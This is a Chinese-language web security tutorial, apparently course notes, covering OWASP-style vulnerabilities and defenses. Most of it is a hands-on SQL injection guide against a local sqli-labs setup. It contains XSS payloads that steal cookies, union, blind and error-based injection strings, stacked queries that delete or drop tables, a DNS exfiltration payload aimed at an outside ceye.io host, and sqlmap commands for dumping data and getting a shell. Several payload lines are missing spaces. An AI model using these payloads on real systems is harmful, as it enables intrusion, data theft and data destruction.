注入漏洞
攻击方式
利用应用程序弱点，通过恶意字符将恶意代码写入数据库，获取敏感数据或进一步在服务器执行命令。
漏洞原因
未审计的数据输入框
使用网址直接传递变量
未过滤的特殊字符
SQL 错误回显
漏洞影响
获取敏感数据或进一步在服务器执行命令接管服务器
SQL 注入
其实注入有很多类型，常见的注入包括：SQL、OS 命令、ORM、LDAP和表达式语言或者 OGNL 注入，对于应用解释器来说这些概念都是相同的。对于最常见的SQL注入，后端开发人员经常会拼接 SQL 查询；在不经意间就引入了 SQL 注入漏洞。
一个例子
select * from users where pwd='输入字符'
-- 恶意代绕过 ' or 1=1 --'
select * from uses where pwd = '' or 1=1 --'
SQL 注入工具
作为最强大的 SQL 注入工具，这里要介绍下基于 python开发的 SQLmap，SQLmap 支持对 PostgreSql，MySQL，Access，MsSql Server 等数据库的自动化注入。是在检查SQL注入漏洞方面最得力的工具。
SQL 注入防护
关闭 SQL 错误回显
前端输入字符白名单验证（长度、类型等）
对输入的特殊字符使用转义处理
SQL 操作使用 PreParedStatement
SQL 服务运行于专门的账号，并且使用最小权限
限制 SQL 服务的远程访问，只开放给特定开发人员
代码审计，最有效的检测应用程序的注入风险的方法之一
使用成熟的 waf

失效的身份认证
攻击方式
攻击者利用网站应用程序中的身份认证缺陷获取高权限并进行攻击应用服务
漏洞原因
应用程序身份认证系统认证缺陷
漏洞影响
盗用账号与身份
常见设计缺陷
修改利用网络协议数据包获取使用者账号密码
网站设计不良，可直接绕过验证页面
使用者忘记注销，而让攻击者有可趁之机
弱密码
弱密码攻击
身份认证非常容易受到弱密码攻击，常用的弱密码攻击方式有
常用密码攻击 - 使用泄露的密码字典攻击
使用公司名称缩写、域名、电话号码
全数字、英文的简单密码
账号与密码相同的
不同网站、电脑、APP 使用了相同的密码
漏洞防护
网站的登录页面就使用加密连接
网站应该具体良好的权限控制与管理
网站应该具备超时注销机制

敏感数据泄露
攻击方式
常见的攻击方式主要是扫描应用程序获取到敏感数据
漏洞原因
应用维护或者开发人员无意间上传敏感数据，如 github 文件泄露
敏感数据文件的权限设置错误，如网站目录下的数据库备份文件泄露
网络协议、算法本身的弱点，如 telent、ftp、md5 等
漏洞影响
应用程序、网站被修改
个人资料、公司资料泄露，被用于售卖获利
漏洞防护
对于 github 泄露，定期对仓库扫描
对于应用网站目录定期扫描
使用强壮的网络协议与算法

XML 外部实体漏洞
攻击方式
当应用程序解析 XML文件时包含了对外部实体的引用，攻击者传递恶意包含 XML 代码的文件，读取指定的服务器资源。
漏洞原因
XML 协议文档本身的设计特性，可以引入外部的资源；定义 XML 文件时使用的外部实体引入功能
漏洞影响
读取服务器敏感资料，如、/etc/password
读取应用程序源码
漏洞防护
关闭 DTD (Data Type Definition)
禁止外部实体引入

无效的访问控制
攻击方式
没有检查身份，直接导致攻击者绕过权限直接访问
漏洞原因
漏洞影响
绕过路径，如未读取的参数做检查，导致路径绕过读取到敏感文件
权限提升，如未对权限做检查，导致攻击者变更权限
垂直越权，攻击者可以从普通的用户权限提升到管理员的权限访问应用程序
水平越权，攻击者可以从普通用户A的权限提升到普通用户B的权限访问应用程序
漏洞防护
对参数的白名单过滤
对权限的控制管理重新设计与限制
限制下载文件的类型

安全配置错误
攻击方式
攻击者利用错误配置攻击，获取敏感数据或者提升权限
漏洞原因
开发或者维护人员设置了错误的配置，如 python 开发中对于 Django 框架在生产环境启用了 Debug 模式
漏洞影响
可让攻击者获取到敏感数据
可让攻击者提升权限，如未修改应用程序配置的默认密码，未删除应用程序安装程序目录文件等

目录遍历
检查文件扩展名
重命名上传文件
控制上传文件的权限，如关闭执行权限
移除不使用的页面，如安装目录文件
移除临时文件、备份文件
不使用简单的命名规则，防止猜测
定义白名单

跨站脚本攻击
攻击方式
攻击者使用恶意字符嵌入应用程序代码中并运行，盗取应用程序数据
常见攻击 payload
><script>alert(document.cookie)</script>
='><script>alert(document.cookie)</script>
"><script>alert(document.cookie)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
%3Cscript%3Ealert('XSS')%3C/script%3E
<script>alert('XSS')</script>
<imgsrc="javascript:alert('XSS')">
<imgsrc="http://888.888.com/999.png"onerror="alert('XSS')"><divstyle="height:expression(alert('XSS'),1)"></div>（这个仅于IE7(含)之前有效）
漏洞原因
应用程序未对应用输入做过滤与检查，导致用户数据被当作代码执行。
漏洞影响
欺骗使用者点击嵌入了恶意网站的正常网站，获取使用得的敏感数据
盗取使用者 cookie，冒用使用者身份
漏洞防护
验证输入/接收的字符，过滤或者替换非法字符
使用白名单机制

任意查询命令
创建数据库／表
更新数据库／表内容
更改用户权限
删除数据／表／数据库
执行系统命令

可读取／修改数据库中的库和表
获取用户的账号，密码（可能被加密过），邮箱，联系方式
信用卡信息
修改产品价格
删除数据
可执行系统命令
修改权限，获取系统管理员权限
修改任意文件
安装后门

system_user()  系统用户名
user()         用户名
current_user   当前用户名
session_user() 连接数据库的用户名
database()     数据库名
version()      MYSQL数据库版本
load_file()     转成16进制或者是10进制 MYSQL读取本地文件的函数
@@datadir     读取数据库路径
@@basedir    MYSQL 安装路径
@@version_compile_os     操作系统

1' and 1=1; # , 1' and 1=1; # 判断是否可以被注入
1' or 1=1; # 来尝试获取全部账号信息
1' union all select 1, 2; # 来判断可以获取的参数个数
1' union all select 1,(@@version); #来获取数据库版本
1' union all select 1,(database()); #获取数据库名称
1' union all select 1, group_concat(column_name) frominformation_schema.columns where table_name='users' ; #获取表所有列名

union注入
Boolean注入
报错注入
时间注入
堆叠注入
二次注入
宽字节注入
cookie注入
base64注入
XFF注入
eg:
$sql = "select * from users where id =$_GET['id']";
# 当id= 1' 
select * from users where id = 1'
# 当id= 1 and 1=1
select * from users where id = 1 and 1=1
在mysql 5.0 之后数据库中存放一个特殊的库information_schema 其中记住该库中三个特殊的表
SCHEMATA TABLES  COLUMNS
SCHEMATA 表格存储了用户创建的所有数据库的库名
TABLES 存储用户创建的所有数据库的库名和表名
COLUMNS 存储用户创建的所有数据库的库名，表名，字段名
# 当不知道任何条件时
select 需要查询的字段名 from 库名.表名;
# 在知道已知条件下
select 需要查询的字段名 from 库名.表名 where 已知的字段='已知条件的值';
# 在知道两条已知条件
select 需要查询的字段名 from 库名.表名 where 已知的字段1='已知条件的值1' and 已知的字段2='已知条件的值2';
limit 用法
#  用法
limit m,n  m 记录开始的位置 n 取n条记录
例如 limit 0,1 从第一条记录开始取一条记录
order by 查看字段数

# 看下第一关的sql源码
$sql="SELECT * FROM users WHERE id='$id' LIMIT0,1";
http://127.0.0.1/sqllab/Less-1/?id=1' order by 4 --+
SELECT * FROM users WHERE id='1' order by 4 --+'LIMIT 0,1
# 输入3 再去判断  一半使用二分法进行判断字段数
SELECT * FROM users WHERE id='1' order by 3 --+'LIMIT 0,1
union 联合注入
# 把id值改为负数使where后面条件不成立进而执行select语句
http://127.0.0.1/sqllab/Less-1/?id=-1' union select1,2,3 --+
# 数据库信息
http://127.0.0.1/sqllab/Less-1/?id=-1' union select1,database(),version() --+
# 获取数据库名称后利用information_schema获取表名
http://127.0.0.1/sqllab/Less-1/?id=-1' union select1,(select table_name from information_schema.tables wheretable_schema='security' limit 0,1),3 --+
# 获取第二个表名
http://127.0.0.1/sqllab/Less-1/?id=-1' union select1,(select table_name from information_schema.tables wheretable_schema='security' limit 1,1),3 --+
知道了库名，表名，字段名就可以构造SQL语句进行查询数据了
http://127.0.0.1/sqllab/Less-1/?id=-1' union select1,(select email_id from security.emails limit 0,1),3 --+

基于布尔的SQL盲注-逻辑判断
regexp,like,ascii,left,ord,mid
基于时间的SQL盲注-延时判断
if,sleep
基于报错的SQL盲注-报错回显
floor，updatexml，extractvalue
参考：
like 'ro%'           #判断ro或ro...是否成立
regexp '^x[a-z]' #匹配xiaodi及xiaodi...等
if(条件,5,0)           #条件成立返回5 反之返回0
sleep(5)             #SQL语句延时执行5秒
mid(a,b,c)           #从位置b开始，截取a字符串的c位
substr(a,b,c)        #从b位置开始，截取字符串a的c长度
left(database(),1)，database()#left(a,b)从左侧截取a的前b位
length(database())=8 #判断数据库database()名的长度
ord=ascii(x)=97 #判断x的ascii码是否等于97
select 查询数据
在网站应用中进行数据显示查询操作
例：select * from news where id=$id
insert 插入数据
在网站应用中进行用户注册添加等操作
例：insert into news(id,url,text)values(2,'x','$t')
1' and UpdateXML(1,concat('~',database()),1))#
delete 删除数据
后台管理里面删除文章删除用户等操作
例：delete from news where id=$id
1' and UpdateXML(1,concat('~',database()),1))#
update 更新数据
会员或后台中心数据同步或缓存等操作
例：update user set pwd='$p' where id=2 andusername='admin'
1' and UpdateXML(1,concat('~',database()),1))#

// 如果数据库字符对应ASCII 编码的115 睡眠5秒否则输出1
and if(ascii(substr(database(),1,1))=115,sleep(5),1)--+
// 延迟注入
http://127.0.0.1/sqllib/Less-5/?id=1'andIf(ascii(substr(database(),1,1))=115,1,sleep(5))--+
# 利用 left(database(),1) 尝试查看版本信息判断数据库版本是否为5
http://127.0.0.1/sqllib/Less-5/?id=1%27and%20left(version(),1)=5%23
# 使用时间盲注判断库名是否为s
http://127.0.0.1/sqli/Less-10/?id=1" andif(substr(database(),1,1)='s',sleep(5),1)--+
报错注入
直接将返回的结果返回给我们，此处可以利用报错注入获取信息。报错注入有多种方式
以下使用updatexml() 获取信息
http://127.0.0.1/sqli/Less-5/?id=1'and updatexml(1,concat(0x7e,(select user()),0x7e),1) --+
# 获取当前数据库
http://127.0.0.1/sqli/Less-5/?id=1'and updatexml(1,concat(0x7e,(select database()),0x7e),1) --+

用户输入：1; DELETE FROM products
服务器端生成的 sql 语句为：（因未对输入的参数进行过滤）
Select * from products where productid=1;DELETE FROMproducts
堆叠注入的局限性在于并不是每一个环境下都可以执行，可能受到 API 或者数据库引擎不支持的限制，当然了权限不足也可以解释为什么攻击者无法修改数据或者调用一些程序。
# 新建一个表
select * from student where id=1;create table testlike users;
# 删除上面新建的 test 表
select * from users where id=1;drop table test;
http://127.0.0.1/sqli/Less-38/?id=1';insert intousers(id,username,password) values ('38','less38','hello')--+
42
username: admin
password: a';insert into users(id,username,password)values ('44','less44','hello')#

比如
cookie：PHPSEEION-FFOEWFOWJNFJ
cookie：a' or 1=1#

json语法
数据在名称/值对中
数据由逗号分隔
大括号保存对象
中括号保存数组
http://127.0.0.1/json.php
json={"username":"root"}
json={"username":"root ' and 1=2 unionselect 1,user()#"}

首先使用admin/admin用户登录
登录成功会提示更改密码，退出登录重新创建一个用户
用户名admin'# 密码123
然后使用 admin’# 用户登录进来修改密码
登录admin'# 修改密码反而admin的密码改变了

URL转码
空格  %20
'      %27
#      %23
\      %5C

1%df' or 1   通过php转码  mysql转码得到一个汉字' 从而达到过滤的效果
%df' =====>php(check_addsiashes) ======>%df%5C%27 ======>MySQL(GBK) ======> 運'
%df' union select user(),database()#

securefilepriv特性，有三种状态
1. secure_file_priv为null  表示不允许导入导出
2. secure_file_priv指定文件夹时，表示mysql的导入导出只能发生在指定的文件夹
3. secure_file_priv没有设置时，则表示没有任何限制

select load_file('\\\\requests.mvkn4u.ceye.io\\abc');
payload: http://127.0.0.1/sqli/Less-2/?id=-1 andif((select load_file(concat('\\\\',(selectdatabase()),'.mvkn4u.ceye.io\\abc'))),1,0)--+

1、所有的查询语句都使用数据库提供的参数化查询接口，参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口，使用此接口可以非常有效的防止SQL注入攻击。
2、对进入数据库的特殊字符（’"\尖括号&*;等）进行转义处理，或编码转换。
3、严格限制变量类型，比如整型变量就采用intval()函数过滤，数据库中的存储字段必须对应为int型。
4、数据长度应该严格规定，能在一定程度上防止比较长的SQL注入语句无法正确执行。
5、网站每个数据层的编码统一，建议全部使用UTF-8编码，上下层编码不一致有可能导致一些过滤模型被绕过。
6、严格限制网站用户的数据库的操作权限，给此用户提供仅仅能够满足其工作的权限，从而最大限度的减少注入攻击对数据库的危害。
7、避免网站显示SQL错误信息，比如类型错误、字段不匹配等，防止攻击者利用这些错误信息进行一些判断。
8、在网站发布之前建议使用一些专业的SQL注入检测工具进行检测，及时修补这些SQL注入漏洞。

-u 指定目标URL (可以是http协议也可以是https协议)
-d 连接数据库
--dbs 列出所有的数据库
--current-db 列出当前数据库
--tables 列出当前的表
--columns 列出当前的列
-D 选择使用哪个数据库
-T 选择使用哪个表
-C 选择使用哪个列
--dump 获取字段中的数据
--batch 自动选择yes
--smart 启发式快速判断，节约浪费时间
--forms 尝试使用post注入
-r 加载文件中的HTTP请求（本地保存的请求包txt文件）
-l 加载文件中的HTTP请求（本地保存的请求包日志文件）
-g 自动获取Google搜索的前一百个结果，对有GET参数的URL测试
-o 开启所有默认性能优化
--tamper 调用脚本进行注入
-v 指定sqlmap的回显等级
--delay 设置多久访问一次
--os-shell 获取主机shell，一般不太好用，因为没权限
--os-cmd 执行命令
-m 批量操作
-c 指定配置文件，会按照该配置文件执行动作
-data data指定的数据会当做post数据提交
-timeout 设定超时时间
-level 设置注入探测等级
--risk 风险等级
--identify-waf 检测防火墙类型
--param-del="分割符" 设置参数的分割符
--skip-urlencode 不进行url编码
--keep-alive 设置持久连接，加快探测速度
--null-connection 检索没有body响应的内容，多用于盲注
--thread 最大为10 设置多线程
get型
sqlmap -uhttp://127.0.0.1/sqli-labs-master/Less-1/?id=1
 post型
sqlmap -r "1.txt"
获取当前数据库名称
sqlmap -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1"--current-db
获取指定数据库的表名
sqlmap -u"127.0.0.1/sqli-labs-master/Less-1/?id=1" -D security --tables
获取指定数据库指定表中的字段
sqlmap -u"127.0.0.1/sqli-labs-master/Less-1/?id=1" -D security -T users--columns
获取指定数据库指定表的指定字段的字段内容
sqlmap -u"127.0.0.1/sqli-labs-master/Less-1/?id=1" -D security -T users -Cpassword --dump
sqlmap -r ["请求头文本"]  //测试是否存在注入
sqlmap -r ["请求头文本"]--current-db //查询当前数据库
sqlmap -r ["请求头文本"] -D["数据库名"] --tables //查询当前数据库的所有表
sqlmap -r ["请求头文本"] -D["数据库名"] -T ["表名"] --columns//查询指定库指定表的所有列
sqlmap -r ["请求头文本"] -D["数据库名"] -T ["表名"] -C["列名"] --dump //打印出指定库指定表指定列的所有字段内容
Header注入
sqlmap 在对user-agent 注入的时候，得在文件中的user-agent的参数后面加上 * 或者 -level 3
cookie注入
sqlmap -u"http://127.0.0.1/sqli-labs-master/Less-20/index.php" --cookie"pma_lang=zh_CN;pma_mcrypt_iv=AoXpKxU5KcY%3D;pmaUser-1=7%2FwV%2BDOfbmI%3D;uname=admin;"--level 2